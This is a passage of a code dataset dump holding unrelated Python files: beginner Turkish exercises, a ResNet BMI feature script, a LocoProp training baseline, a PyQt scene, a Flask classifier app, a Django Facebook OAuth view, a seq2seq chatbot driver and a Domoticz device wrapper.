[\"D\",\"A\",\"T\",\"A\",\"S\",\"C\",\"I\",\"E\",\"N\",\"C\",\"E\"]\n\nprint(len(lst))\n\nprint(lst[0],lst[10])\n\ndata = lst[0:4]\n\nprint(data, type(data))\n\nlst.pop(8)\n\nprint(lst)\n\nlst.append(\"P\")\nprint(lst)\n\nlst.insert(8,\"Y\")\nprint(lst)\n\n# Görev 4: Verilen sözlük yapısına aşağıdaki adımları uygulayınız.\n# Adım1: Key değerlerine erişiniz.\n# Adım2: Value'lara erişiniz.\n# Adım3: Daisy key'ine ait 12 değerini 13 olarak güncelleyiniz.\n# Adım4: Key değeri Ahmet value değeri [Turkey,24] olan yeni bir değer ekleyiniz.\n# Adım5: Antonio'yu dictionary'den siliniz.\n\ndict = {\"Christian\": [\"America\", 18],\n \"Daisy\": [\"England\", 12],\n \"Antonio\": [\"Spain\", 22],\n \"Dante\": [\"Italy\", 25]}\n\nprint(dict.keys())\n\nprint(dict.values())\n\ndict[\"Daisy\"][1] = 13\nprint(dict[\"Daisy\"][1] )\n\ndict[\"Ahmet\"] = [\"Turkey\",24]\n\nprint(dict)\n\ndict.pop(\"Antonio\")\n\nprint(dict)\n\n\n\n# Görev 5:Argüman olarak bir liste alan, listenin içerisindeki tek ve çift sayıları ayrı listelere atayan\n# ve bu listeleri return eden fonksiyon yazınız\n\nnum = [1,2,3,4,5,6,7,8,9,10]\ntek = []\ncift = []\n\ndef sayi (liste):\n\n for i in range(len(liste)):\n if liste[i]%2==0:\n cift.append(liste[i])\n\n else:\n tek.append(liste[i])\n\n return cift,tek\n\n\n# Aynı çıktıyı list comprehension ile uygulamak\n\ntek_1 = [i for i in range(len(num)) if not i%2==0]\n\ncift_1 = [i for i in range(len(num)) if i%2==0]\n\nprint(tek_1,\"\\t\",cift_1)\n\n\n# Görev 6: List Comprehension yapısı kullanarak car_crashes verisindeki numeric değişkenlerin isimlerini\n# büyük harfe çeviriniz ve başına NUM ekleyiniz\n\ndf = sns.load_dataset(\"car_crashes\")\n\nprint(df.columns)\n\na = [col.upper() for col in df.columns]\n\nprint(a)\n\n# Görev 7: List Comprehension yapısı kullanarak car_crashes verisinde isminde \"no\" barındırmayan değişkenlerin\n# isimlerinin sonuna \"FLAG\" yazınız\n\nb = [i if \"NO\" in i else i+\"_FLAG\" for i in a]\n\nprint(b)\n\n# Görev 8: List Comprehension yapısı kullanarak aşağıda verilen değişken isimlerinden\n# FARKLI olan değişkenlerin isimlerini seçiniz ve yeni bir dataframe oluşturunuz\n\nog_list = [\"abbrev\",\"no_previous\"]\n\nnew_cols = [i for i in df.columns if not i==og_list[0] or i==og_list[1]]\n\nprint(new_cols)\n\nnew_df = df[new_cols]\n\nprint(new_df.head())","repo_name":"vyscnktn/data_science_and_machine_learning_bootcamp","sub_path":"python-alistirmalari.py","file_name":"python-alistirmalari.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"901555960","text":"import os\n\nfrom torchvision.models import resnet50, ResNet50_Weights\nfrom torchvision.io import read_image, image\nimport cv2\n# Using pretrained weights:\nresnet50(weights=ResNet50_Weights.IMAGENET1K_V1)\n\n# Initialize the Weight Transforms\nweights = ResNet50_Weights.DEFAULT\npreprocess = weights.transforms()\n# Initialize model\nweights = ResNet50_Weights.DEFAULT\nmodel = resnet50(weights=weights)\n\n# Set model to eval mode\nmodel.eval()\n\nimgs_path = \"/home/nata/Documents/melissa\"\nimgs = os.listdir(imgs_path)\ni = 0\nfor filename in imgs:\n # if i == 10:\n # break\n try:\n filename = filename.replace(\"__\", \"_\")\n a = filename.split(\"_\")\n # height = float(a[3]) / 39.37\n # weight = float(a[2]) / 2.205\n # bmi = weight / (height**2)\n bmi = 43.3\n except:\n print(f\"smth wrong with img split. filename = {filename}\")\n continue\n\n try:\n img = read_image(imgs_path + \"/\" + filename, mode=image.ImageReadMode.RGB)\n img_transformed = preprocess(img)\n batch = preprocess(img).unsqueeze(0)\n prediction = model(batch).squeeze(0)\n except:\n print(f\"smth wrong with prediction. Index = {i}, filename = {filename}\")\n continue\n\n\n try:\n with open(\"/home/nata/pythonProj/STRAPS/resnet_melissa.csv\", \"a\") as file:\n a_list = prediction.tolist()\n pred_str = \",\".join(map(str, a_list))\n file.write(filename + \",\" + str(bmi) + \",\" + pred_str)\n file.write(\"\\n\")\n except:\n print(f\"smth wrong with result write. filename = {filename}\")\n continue\n\n i += 1\n\nprint(\"result images = \", i)\n\n# img_path = \"/home/nata/pythonProj/STRAPS-3DHumanShapePose/demo/0001.png\"\n# Apply it to the input image\n\n\n\n\n# prediction = model(batch).squeeze(0).softmax(0)\n# print(\"prediction softmax = \", prediction)\n\n# print(\"------------------------------------\")\n# prediction = model(batch)\n# print(\"prediction = \", prediction)\n# class_id = prediction.argmax().item()\n# score = prediction[class_id].item()\n# category_name = weights.meta[\"categories\"][class_id]\n# print(f\"{category_name}: {100 * score}%\")\n\n# pred = model.forward(img_transformed)\n# print(pred)","repo_name":"naruru-sv/BMI_estimation","sub_path":"resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42956784692","text":"import torch\nfrom torch import nn\nimport wandb\n\nfrom models import MLP\nfrom utils import acc, load_fashion_mnist\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef get_config():\n cfg = dict(\n epochs=15,\n batch_size=1024,\n\n hid_dim=512,\n n_hid_layers=5,\n nonlinearity='tanh',\n bias=True, \n\n opt='adam',\n learning_rate=0.001\n\n )\n \n return cfg\n\ndef get_nonlinearity(cfg):\n if cfg.nonlinearity == 'tanh':\n return torch.tanh\n if cfg.nonlinearity == 'relu':\n return torch.relu\n if cfg.nonlinearity == 'softplus':\n return nn.functional.softplus\n\ndef build_optimizer(cfg, params):\n # K-FAC https://github.com/Thrandis/EKFAC-pytorch/blob/master/kfac.py\n # Shampoo: https://github.com/facebookresearch/optimizers/tree/main/shampoo\n \n if cfg['opt'] == 'adam':\n optimizer = torch.optim.Adam(\n params,\n lr=cfg['learning_rate'],\n )\n\n elif cfg['opt'] == 'sgd':\n optimizer = torch.optim.SGD(\n params,\n lr=cfg['learning_rate'],\n )\n\n elif cfg['opt'] == 'rmsprop':\n optimizer = torch.optim.RMSprop(\n params,\n lr=cfg['learning_rate'],\n )\n\n\n return optimizer\n\ndef train_epoch(model, optimizer, dataloader, criterion):\n runnig_loss = 0\n running_acc = 0 \n for X, y in dataloader:\n optimizer.zero_grad()\n\n X, y = X.to(device), y.to(device)\n\n y_pred = model(X)\n loss = criterion(y_pred, y)\n\n loss.backward()\n optimizer.step()\n\n wandb.log({'train_loss': loss.item()})\n runnig_loss += loss.item() \n running_acc += acc(y_pred, y)\n\n return dict(\n train_loss=runnig_loss/len(dataloader),\n train_acc=running_acc/len(dataloader)\n )\n\ndef main():\n wandb.init(config=get_config(), project='LocoProp')\n cfg = wandb.config\n\n data = load_fashion_mnist(batch_size=cfg.batch_size)\n model = MLP(\n in_dim=data['dim'], hid_dim=cfg.hid_dim, out_dim=data['num_classes'], \n n_hid_layers=cfg.n_hid_layers, nonlinearity=get_nonlinearity(cfg), bias=cfg.bias\n ).to(device)\n optimizer = build_optimizer(cfg, model.parameters())\n criterion = nn.CrossEntropyLoss()\n\n for _ in range(cfg.epochs):\n metrics = train_epoch(model, optimizer, data['trainloader'], criterion)\n print(metrics)\n\nif __name__ == \"__main__\":\n main()","repo_name":"richardcepka/LocoProp","sub_path":"baseline_run.py","file_name":"baseline_run.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"16700525827","text":"from PyQt5.QtWidgets import QGraphicsScene\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import QColor, QPen\nimport math\n\n\nclass QDMGraphicsScene(QGraphicsScene):\n def __init__(self, scene, parent=None):\n super().__init__(parent)\n\n self.scene = scene\n # Settings\n self._color_background = QColor('#393939')\n self._color_light = QColor('#2f2f2f')\n self._color_dark = QColor(\"#292929\")\n\n self.gridSize = 20\n self.gridSquares = 5\n\n self._pen_light = QPen(self._color_light)\n self._pen_light.setWidth(1)\n self._pen_dark = QPen(self._color_dark)\n self._pen_dark.setWidth(2)\n\n # Brackground\n self.setBackgroundBrush(self._color_background)\n\n def setGrScene(self, width, height):\n self.setSceneRect(-width // 2, -height // 2, width, height)\n\n def drawBackground(self, painter, rectangle):\n super().drawBackground(painter, rectangle)\n # Creating the grid\n left = int(math.floor(rectangle.left()))\n right = int(math.ceil(rectangle.right()))\n top = int(math.floor(rectangle.top()))\n bottom = int(math.ceil(rectangle.bottom()))\n\n first_left = left - (left % self.gridSize)\n first_top = top - (top % self.gridSize)\n\n # Computing the lines to be drawn\n lines_light = []\n lines_dark = []\n for x_line in range(first_left, right, self.gridSize):\n if x_line % (self.gridSize * self.gridSquares) != 0:\n lines_light.append(QLine(x_line, top, x_line, bottom))\n else:\n lines_dark.append(QLine(x_line, top, x_line, bottom))\n for v_line in range(first_top, bottom, self.gridSize):\n if v_line % (self.gridSize * self.gridSquares) != 0:\n lines_light.append(QLine(left, v_line, right, v_line))\n else:\n lines_dark.append(QLine(left, v_line, right, v_line))\n\n # Draw the lines\n painter.setPen(self._pen_light)\n painter.drawLines(*lines_light)\n\n painter.setPen(self._pen_dark)\n painter.drawLines(*lines_dark)\n","repo_name":"cubicalia/Node_Editor","sub_path":"ui/scenes/node_graphics_scene.py","file_name":"node_graphics_scene.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"75191027823","text":"from flask import Flask, render_template, request\nimport os\nimport joblib\nfrom dotenv import load_dotenv\n\napp = Flask(__name__)\nload_dotenv()\n\nmodel = joblib.load('classifier.joblib')\n\n# Define dictionaries for dropdown options\nindustries = {\n 'None': None,\n 'Horizontal': 16,\n 'Healthcare': 15,\n 'Legal': 17,\n 'Energy, Gas, Oil, Utilities': 10,\n 'Construction': 7,\n 'Entertainment, Hospitality, Travel': 11,\n 'Retail': 23,\n 'Real Estate & Property Mgt.': 22,\n 'Financial Services': 12,\n 'Education': 9,\n 'Automotive': 1,\n 'Sports and Fitness': 24,\n 'Food': 13,\n 'Logistics, Supply Chain, Transportation': 18,\n 'CPG': 4,\n 'Agriculture': 0,\n 'Non-Profit': 20,\n 'Manufacturing': 19,\n 'Cannabis': 5,\n 'Government': 14,\n 'Aviation': 2,\n 'Real Estate': 21,\n 'BioTech': 3,\n 'Cryptocurrency': 8,\n 'Clinical': 6\n}\n\ncategories = {\n 'None': None,\n 'On-Demand Services': 16,\n 'Communications': 7,\n 'Analytics and BI': 2,\n 'Business Mgt and ERP': 4,\n 'Compliance': 8,\n 'Practice Management': 18,\n 'Sales and Marketing': 20,\n 'Logistics and Supply Chain': 14,\n 'IT Mgt': 13,\n 'Accounting and Finance': 1,\n 'Ecommerce': 11,\n 'Document Management': 10,\n 'HR and Recruiting': 12,\n 'Cybersecurity': 9,\n 'Cloud and Software Dev Tools': 6,\n 'Point of Sale': 17,\n 'Marketplace': 15,\n 'Automation': 3,\n 'Clinical': 5,\n 'eLearning': 24,\n 'AI and Machine Learning': 0,\n 'Virtual Reality': 22,\n 'Student Mgt': 21,\n 'Practice Mgt': 19,\n 'eCommerce': 23\n}\n\nc3_options = {\n 'None': None,\n 'B2B SaaS': 0,\n 'B2G': 1\n}\n\nc4_options = {\n 'None': None,\n 'Self-funded': 7,\n 'VC-funded': 8,\n 'Angel or Seed Funding': 1,\n 'Acquired': 0,\n 'Public': 6,\n 'Private Equity funding': 5,\n 'Other': 3,\n 'Angel or Seed funding': 2,\n 'Private Equity Funding': 4\n}\n\nc5_options = {\n 'None': None,\n 'Small': 0,\n 'Startup': 1,\n 'Large': 2,\n 'Medium': 3\n}\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n selected_industry = 'None'\n selected_category = 'None'\n selected_c3 = 'None'\n selected_c4 = 'None'\n selected_c5 = 'None'\n result = ''\n\n if request.method == \"POST\":\n selected_industry = request.form.get(\"industry\")\n selected_category = request.form.get(\"category\")\n selected_c3 = request.form.get('three')\n selected_c4 = request.form.get('four')\n selected_c5 = request.form.get('five')\n input_data = [\n industries[selected_industry],\n categories[selected_category],\n c3_options[selected_c3],\n c4_options[selected_c4],\n c5_options[selected_c5]\n ]\n prediction = model.predict([input_data])\n result = 'Can trust' if prediction[0] else \"Can't be trusted\"\n\n return render_template(\n \"index.html\",\n industries=industries.keys(),\n categories=categories.keys(),\n c3_options=c3_options.keys(),\n c4_options=c4_options.keys(),\n c5_options=c5_options.keys(),\n selected_industry=selected_industry,\n selected_category=selected_category,\n selected_c3=selected_c3,\n selected_c4=selected_c4,\n selected_c5=selected_c5,\n result=result\n )\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=os.environ.get('PORT'), debug=True)\n","repo_name":"Vishallas/customer-trust-rel-modle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40111582292","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nimport json\nimport urllib\nimport urllib2\nimport urlparse\nfrom urllib2 import HTTPError\n\ndef get_user_access_token(request):\n\thost_url = request.get_host()\n\tredirect_url = \"http://\" + host_url + request.path\n\tpage_url = \"https://graph.facebook.com/v2.3/oauth/access_token\"\n\tquery_data = {\n\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\"redirect_uri\": redirect_url,\n\t\t\"client_secret\": settings.FACEBOOK_APP_SECRET,\n\t\t\"code\": request.GET[\"code\"]\n\t}\n\t# We create a request with data which will result in a POST\n\treq = urllib2.Request(page_url, urllib.urlencode(query_data))\n\taccess_token_response = urllib2.urlopen(req)\n\taccess_token_json = access_token_response.read()\n\taccess_token_data = json.loads(access_token_json)\n\t#print(access_token_data)\n\t#print(\"aquired user access token\")\n\t#print(user_access_token[\"access_token\"])\n\n\treturn access_token_data[\"access_token\"]\n\ndef get_app_access_token():\n\tpage_url = \"https://graph.facebook.com/oauth/access_token\"\n\tquery_data = {\n\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\"client_secret\": settings.FACEBOOK_APP_SECRET,\n\t\t\"grant_type\": \"client_credentials\"\n\t}\n\t# We create a request with data which will result in a POST\n\treq = urllib2.Request(page_url, urllib.urlencode(query_data))\n\taccess_token_response = urllib2.urlopen(req)\t\n\taccess_token_json = access_token_response.read()\n\t#access_token_data = dict(urlparse.parse_qsl(access_token_qs))\n\taccess_token_data = json.loads(access_token_json)\n\t#print(app_access_token)\n\t#print(\"aquired app access token\")\n\t#print(app_access_token[\"access_token\"])\n\t\n\treturn access_token_data[\"access_token\"]\n\ndef validate_access_token(user_access_token):\n\tpage_url = \"https://graph.facebook.com/debug_token\"\n\tquery_data = {\n\t\t\"input_token\": user_access_token,\n\t\t\"access_token\": settings.FACEBOOK_APP_ID + \"|\" + settings.FACEBOOK_APP_SECRET\n\t}\n\t# The response will be a json object that we need to decode\n\tdebug_token_response = urllib2.urlopen(page_url + \"?\" + urllib.urlencode(query_data))\n\tdebug_token_json = debug_token_response.read()\n\tdebug_token_dict = json.loads(debug_token_json)\n\t#print(\"got debug token data\")\n\t#print(debug_token_dict)\n\t\n\tdebug_token_data = debug_token_dict[\"data\"]\n\tapp_id = settings.FACEBOOK_APP_ID\n\t\n\treturn debug_token_data[\"app_id\"] == app_id\n\ndef get_user_data(user_access_token):\n\tpage_url = \"https://graph.facebook.com/me\"\n\tquery_data = {\n\t\t\"access_token\": user_access_token,\n\t}\n\tme_response = urllib.urlopen(page_url + \"?\" + urllib.urlencode(query_data))\n\tme_json = me_response.read()\n\tme_data = json.loads(me_json)\n\treturn me_data\n\ndef facebook_login(request):\n\tfacebook_page = \"\"\n\tif \"code\" in request.GET:\n\t\ttry:\n\t\t\t# First we need to get a user access token from the code we got\n\t\t\tuser_access_token = get_user_access_token(request)\n\t\t\t#print(user_access_token)\n\t\t\t\n\t\t\t# Verify that the token is valid\n\t\t\tif validate_access_token(user_access_token):\n\t\t\t\n\t\t\t\t# Get data about the user that we need to login to the site or to create a new user\n\t\t\t\tuser_data = get_user_data(user_access_token)\n\t\t\t\n\t\t\t\tuser = authenticate(user_data=user_data, access_token=user_access_token)\n\t\t\t\tif user is not None:\n\t\t\t\t\tif user.is_active:\n\t\t\t\t\t\tlogin(request, user)\n\t\t\t\t\t\treturn HttpResponseRedirect(\"/\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tfacebook_page = \"User is not active\"\n\t\t\t\telse:\n\t\t\t\t\tfacebook_page = \"Invalid login\"\n\t\t\telse:\n\t\t\t\tfacebook_page = \"Invalid access token\"\n\t\t\n\t\t#print(json.dumps(debug_token_response, sort_keys = False, indent = 4))\n\t\texcept HTTPError as e:\n\t\t\tjson_error = json.loads(e.read())\n\t\t\treturn HttpResponse(json.dumps(json_error, sort_keys = False, indent = 4))\n\telse:\n\t\tquery_data = {\n\t\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\t\"redirect_uri\": \"http://\" + request.get_host() + request.path,\n\t\t\t\"scope\": \"email\"\n\t\t}\n\t\tlogin_url = \"https://www.facebook.com/dialog/oauth?\" + urllib.urlencode(query_data)\n\t\treturn HttpResponseRedirect(login_url)\n\t\n\treturn HttpResponse(facebook_page)","repo_name":"gidmonbrewing/hops_se","sub_path":"noctoz_oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10547680837","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 18:54:02 2017\n\n@author: Thomas\n\"\"\"\n\nfrom __future__ import division\nimport xlrd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef load_traces(filename, sheetname):\n book = xlrd.open_workbook(filename)\n sheet = book.sheet_by_name(sheetname)\n \n res = {}\n for row in range(1, sheet.nrows):\n key = sheet.cell_value(row, 0)\n res[key] = {\"number_cores\": sheet.cell_value(row,1),\n \"time_begin\": math.ceil(sheet.cell_value(row,2)/60),\n \"time_end\": math.ceil(sheet.cell_value(row,3)/60),\n \"time\": math.ceil(sheet.cell_value(row,4)/60)}\n \n return res\n\ndef plot_sum_cores(values, filename=\"\"):\n max_time = int(max([values[key][\"time_end\"] for key in values.keys()]))\n\n utilization = np.zeros(max_time)\n \n for key in values.keys():\n t_begin = values[key][\"time_begin\"]\n t_end = values[key][\"time_end\"]\n utilization[t_begin:t_end] += values[key][\"number_cores\"]\n \n plt.figure()\n plt.plot(np.array(range(max_time))/60, utilization)\n plt.xlabel(\"Time in h\")\n plt.savefig(\"plot_traces/\"+filename, bbox_inches=\"tight\", dpi=400)\n\nfor i in range(1,7):\n plot_sum_cores(load_traces(\"traces.xlsx\", \"DS\"+str(i)), \"DS\"+str(i)+\".png\") \n\n","repo_name":"ThomasSchuetz/workspace","sub_path":"JobShopScheduling/visualize_traces.py","file_name":"visualize_traces.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"32622662725","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport torch\nimport torch.nn as nn \nfrom torch import optim\nimport os\n\nfrom formatData import corpus, corpus_name, datafile\nfrom cleanData import loadPrepareData, trimRareWords\nfrom evaluation import GreedySearchDecoder, BeamSearchDecoder\nfrom encoder import EncoderRNN\nfrom decoder import LuongAttnDecoderRNN\nfrom trainingProcedure import trainIters\nfrom vocabulary import Voc\nfrom evaluationProcedure import evaluateInput\nUSE_CUDA = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\n\n\n#############################################################################\n# PART 1 : LOAD & PREPROCESS DATA \n# Using the Cornell Movie-Dialogs Corpus : Conversational exchanges from 617 movies\n# Reformat data into structures of form question-answers\n# Output : formatted_movie_lines.txt\n#############################################################################\n\n#Uncomment to format the data\n#formatData()\n\n\n##############################################################################\n#PART 2 : LOAD AND TRIM DATA \n# Mapping each unique word to a discrete numerical space\n##############################################################################\n\n\n# Preprocessing : convert to ascii, lowercase, trim non-letter, max-length\n# Load/Assemble voc and pairs\nsave_dir = os.path.join(\"data\", \"save\")\nvoc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)\n\n#Print some pairs to validate\n#print(\"\\npairs:\")\n#for pair in pairs[:10]:\n# print(pair)\n\n# Trim voc and pairs\npairs = trimRareWords(voc, pairs)\n\n\n#############################################################################\n# PART 3: PREPARE DATA FOR MODELS\n# Models expect numerical torch tensors as inputs\n# USing mini-batch we need to have same length for sentences so we pad\n#############################################################################\n\n# Example for validation\n#small_batch_size = 5\n#batches = batch2TrainData(voc, [random.choice(pairs) for _ in range(small_batch_size)])\n#input_variable, lengths, target_variable, mask, max_target_len = batches\n\n#print(\"input_variable:\", input_variable)\n#print(\"lengths:\", lengths)\n#print(\"target_variable:\", target_variable)\n#print(\"mask:\", mask)\n#print(\"max_target_len:\", max_target_len)\n\n##############################################################################\n# PART 4 : DEFINE SEQ2SEQ MODEL\n# Using two RNN one for encoder (historical data) and one for decoder (Predictions)\n##############################################################################\n\n###################\n# PART 4.1: ENCODER\n# See encooder.py\n\n####################\n# PART 4.2 : DECODER\n# See decoder.py \n \n##############################################################################\n# PART 5 : DEFINE TRAINING PROCEDURE\n##############################################################################\n\n# See trainingProcedure.py\n \n##############################################################################\n# PART 6 : DEFINING EVALUATION\n# Talkin to the bot\n# Defining how the model decode the encoded input\n##############################################################################\n\n# See evaluationProcedure.py\n\n##############################################################################\n# PART 7 : RUN THE MODEL\n# Choose to start from scratch or set a checkpoint to load from\n#############################################################################\n\n# Configure models\nmodel_name = 'cb_model4layerlowlr'\nattn_model = 'dot'\n#attn_model = 'general'\n#attn_model = 'concat'\n\nhidden_size = 512\n#hidden_size = 700 \n\nencoder_n_layers = 4 \ndecoder_n_layers = 4\n#encoder_n_layers = 3\n#decoder_n_layers = 3\n\n#dropout = 0.1\ndropout = 0.1\n\nbatch_size = 32\n\n\n# Set checkpoint to load from; set to None if starting from scratch\nloadFilename = None\ncheckpoint_iter = 8000\ncheckpoint = ''\n#loadFilename = os.path.join(save_dir, model_name, corpus_name, '{}-{}_{}'.format(\n # encoder_n_layers, decoder_n_layers, hidden_size),\n # '{}_chceckpoint.tar'.format(checkpoint_iter))\nloadFilename = os.path.join(r\"C:\\Users\\uros\\Desktop\\chatbot-udes\\data\\save\\cb_model4layerlowlr\\openSubtitles+cornell\\4-4_512\\400000_checkpoint.tar\")\n# Load model if a loadFilename is provided\nif loadFilename:\n # If loading on same machine the model was trained on\n checkpoint = torch.load(loadFilename)\n \n \n #If loading a model trained on GPU to CPU\n #checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))\n \n encoder_sd = checkpoint['en']\n decoder_sd = checkpoint['de']\n encoder_optimizer_sd = checkpoint['en_opt']\n decoder_optimizer_sd = checkpoint['de_opt']\n embedding_sd = checkpoint['embedding']\n voc = Voc(corpus_name)\n voc.__dict__ = checkpoint['voc_dict']\n\nprint('Building encoder and decoder ...')\n\n \n\n# Initialize word embeddings\nembedding = nn.Embedding(voc.num_words, hidden_size)\nif loadFilename:\n \n embedding.load_state_dict(embedding_sd)\n \n# Initialize encoder & decoder models\nencoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)\ndecoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, \n decoder_n_layers, dropout)\n\nif loadFilename:\n encoder.load_state_dict(encoder_sd)\n decoder.load_state_dict(decoder_sd)\n\n# Use appropriate device\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\nprint('Models built and ready to go!')\n\n##############################################################################\n# STEP 8 : RUN THE TRAINING\n##############################################################################\n\n# Configure training/optimization\nclip = 50.0\n\nteacher_forcing_ratio = 1.0\n#teacher_forcing_ratio = 0.5\n\n#learning_rae = 0.0001\n#learning_rate = 0.00015 model errthiun\n#learning_rate = 0.000001 errr2\nlearning_rate = 0.0001\ndecoder_learning_ratio = 5.0\nn_iteration = 400000\nprint_every = 1000\nsave_every = 10000\n# Ensure dropout\nencoder.train()\ndecoder.train()\n\n# Initialize optimizers\nprint('Building optimizers ...')\n\nencoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)\ndecoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)\nif loadFilename:\n encoder_optimizer.load_state_dict(encoder_optimizer_sd)\n decoder_optimizer.load_state_dict(decoder_optimizer_sd)\n\n# If you have cuda, configure cuda to call\nfor state in encoder_optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n \n\nfor state in decoder_optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n# Run training iterations\nprint(\"Starting Training!\")\ntrainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer,\n embedding, encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size,\n print_every, save_every, clip, corpus_name, loadFilename, \n teacher_forcing_ratio, checkpoint, hidden_size)\n\n##############################################################################\n# FINAL STEP : TALKING WITH THE BOT\n##############################################################################\n\n# Set dropout layers to eval mode\nencoder.eval()\ndecoder.eval()\n\n# Initialize search module\nsearcher = GreedySearchDecoder(encoder, decoder)\n#searcher = BeamSearchDecoder(encoder, decoder, beamWidth = 10)\n# Begin chatting \nevaluateInput(encoder,decoder,searcher,voc)\n\n","repo_name":"urospet/chatbot","sub_path":"pythorch-chatbot.py","file_name":"pythorch-chatbot.py","file_ext":"py","file_size_in_byte":7714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"71259701422","text":"# 연습문제 베이비진 게임 (제출용) D2\r\n# 완전탐색 리스트! 해서\r\n# 베이비진 검사하기\r\n# https://m.blog.naver.com/ojeongeuni/221325229337\r\n\r\ndef bbg(i,k): #i: 값을 결정할 자리, k: 결정할 개수\r\n global ans\r\n if i==k: #babygin 판별\r\n now = lst\r\n if (now[0]+1==now[1] and now[1]+1==now[2]) or (now[0]==now[1]==now[2]):\r\n if (now[3]==now[4]==now[5]) or (now[3]+1==now[4] and now[4]+1==now[5]):\r\n ans = 1\r\n return\r\n\r\n else: #리스트 만들기\r\n for j in range(i,k): #자신부터 오른쪽 원소들과 교환\r\n lst[i], lst[j] = lst[j], lst[i]\r\n bbg(i+1,k)\r\n lst[i],lst[j] = lst[j],lst[i] #원래대로\r\n\r\n\r\nT = int(input())\r\nfor tc in range(1,T+1):\r\n lst = list(map(int, input()))\r\n ans = 0\r\n bbg(0,len(lst))\r\n\r\n print(f'#{tc} {ans}')","repo_name":"dontk1llme/TIL","sub_path":"Python/algorithm/230327/베이비진.py","file_name":"베이비진.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"71150281904","text":"#!/usr/bin/python3\n\nclass Device:\n \"\"\"Wraps a Domoticz device and provides methods to read values and change state.\"\"\"\n\n def __init__(self, domoticz, state):\n self.id = int(state['idx'])\n self.name = state['Name']\n self.capabilities = []\n\n self._domoticz = domoticz\n self._detect_capabilities()\n\n #Internals\n def _assert_capability(self, c):\n if not (c in self.capabilities):\n raise TypeError(\"Can't do that! I have the following capabilities: \" + ', '.join(self.capabilities))\n\n def _get_state(self, value=None):\n state = self._domoticz.get_device_state(self.id)\n return state.get(value) if (state and value) else state\n\n def _detect_capabilities(self):\n switchType = self._get_state(\"SwitchType\")\n if switchType:\n self.capabilities += [\"switch\"]\n if switchType == \"Dimmer\":\n self.capabilities += [\"dim\"]\n\n if self._get_state(\"Temp\"):\n self.capabilities += [\"thermometer\"]\n\n if self._get_state(\"Humidity\"):\n self.capabilities += [\"hygrometer\"]\n\n def _request(self, qd):\n return self._domoticz._agent.request(qd)\n\n #Output\n def __str__(self):\n return str(self.id) if not self.name else \"{0.name} ({0.id})\".format(self)\n\n def readout(self):\n out = [str(self)]\n if \"switch\" in self.capabilities:\n out += [\"Switch status: \" + (\"ON\" if self.is_on else \"OFF\")]\n if \"dim\" in self.capabilities:\n out += [\"Dimmer level: {0:.0%}\".format( self.dim_level )]\n if \"thermometer\" in self.capabilities:\n out += [\"Temperature: {0}\".format( self.temperature )]\n if \"hygrometer\" in self.capabilities:\n out += [\"Humidity: {0:.0%}\".format( self.humidity )]\n\n return '\\n'.join(out);\n\n #Switch functionality\n @property\n def is_on(self):\n self._assert_capability(\"switch\")\n return self._get_state(\"Status\") != \"Off\"\n\n @property\n def dim_level(self):\n return (self._get_state(\"Level\") / 100.0) if self.is_on else 0;\n\n def switch(self, state):\n self._assert_capability(\"switch\")\n\n switchcmd = None\n if isinstance(state, str):\n switchcmd = state.capitalize()\n if switchcmd not in [\"On\", \"Off\"]:\n raise ValueError(\"switch(state) must be a boolean value or the string 'On' or 'Off'.\")\n else:\n switchcmd = \"On\" if state else \"Off\"\n\n self._domoticz.invalidate_device(self.id)\n\n self._request({\n \"type\": \"command\",\n \"param\": \"switchlight\",\n \"idx\": self.id,\n \"switchcmd\": switchcmd,\n })\n\n 